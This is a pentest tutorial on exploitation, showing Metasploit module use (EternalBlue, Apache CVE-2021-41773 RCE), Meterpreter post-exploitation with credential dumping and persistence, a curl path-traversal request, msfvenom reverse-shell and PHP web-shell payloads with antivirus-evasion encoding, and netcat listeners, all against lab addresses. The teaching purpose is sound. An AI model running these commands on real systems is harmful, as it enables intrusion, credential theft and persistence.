Advanced Pentest & Offensive
Exploitation with Metasploit and manual — modules, payloads, shells
Exploitation is the moment when an identified vulnerability is used to gain access. It requires precision: the wrong exploit may crash a production service. Never run exploits on systems without formal authorization.
Metasploit Framework — basic structure
# Start the console
msfconsole
# Search for modules by CVE or name
search cve:2021-44228 # Log4Shell
search type:exploit name:smb # SMB exploits
search platform:linux rank:excellent
# Select and configure module
use exploit/multi/handler
use exploit/windows/smb/ms17_010_eternalblue
show options # view required parameters
show payloads # view compatible payloadsAnatomy of a Metasploit module
Components:
Exploit → code that triggers the vulnerability
Payload → code executed after exploitation (shell, meterpreter)
Encoder → payload obfuscation (AV evasion)
NOP sled → padding for memory alignment
Payload types:
singles → self-contained, no staging dependency
stagers → small code that downloads the full stage
stages → full payload (meterpreter, VNC)
Notation:
windows/x64/meterpreter/reverse_tcp → stager + stage
windows/x64/shell_reverse_tcp → singleExample: web vulnerability exploitation (lab environment)
# Scenario: Apache 2.4.49 with CVE-2021-41773 (path traversal + RCE)
# Fictional lab host: 192.168.1.50
use exploit/multi/http/apache_normalize_path_rce
set RHOSTS 192.168.1.50
set RPORT 80
set LHOST 192.168.1.100 # your attack machine
set LPORT 4444
set PAYLOAD linux/x64/meterpreter/reverse_tcp
runMeterpreter — advanced shell
# Basic Meterpreter commands
sysinfo # OS, hostname, architecture
getuid # current user
ps # running processes
upload file.txt # send file to target
download /etc/passwd # retrieve file
shell # open native OS shell
# Privilege escalation
getsystem # attempt to elevate to SYSTEM (Windows)
run post/multi/recon/local_exploit_suggester # suggest local exploits
# Persistence
run post/windows/manage/persistence_exe
run post/linux/manage/cron_persistence
# Credential dumping (Windows)
hashdump # SAM hashes
run post/windows/gather/credentials/credential_collectorManual exploits — without Metasploit
Alternative tools and public PoCs:
# Search for exploits by CVE
searchsploit apache 2.4.49
searchsploit -x exploits/linux/webapps/50383.sh # review before using
# Copy to working directory
searchsploit -m exploits/linux/webapps/50383.sh
# Path Traversal via curl (CVE-2021-41773)
# Lab environment: 192.168.1.50
curl "http://192.168.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
# Manual SQLi example (authorized environment only)
# Identify injection point
# Extract data via UNION SELECT or error-based techniquePayload generation with msfvenom
# Linux reverse shell ELF
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
# Windows reverse shell EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
# PHP payload for web shell
msfvenom -p php/reverse_php LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
# With encoder for basic evasion
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
-e x64/xor -i 5 \
-f exe -o payload_encoded.exeListener to catch the shell
# Via Metasploit (recommended — more stable)
use exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run -j # run in background
# Via netcat (simple)
nc -lvnp 4444Documenting exploitation
For each executed exploit, record:
1. CVE / vulnerability exploited
2. Exact command used
3. Result: access obtained? what privilege level?
4. Screenshot or session log
5. Timestamp
6. Demonstrated impact (what was possible with the access)
This documentation is the foundation of the pentest report.Exploiting is the smallest part of the work — documenting correctly is what turns access into value for the client.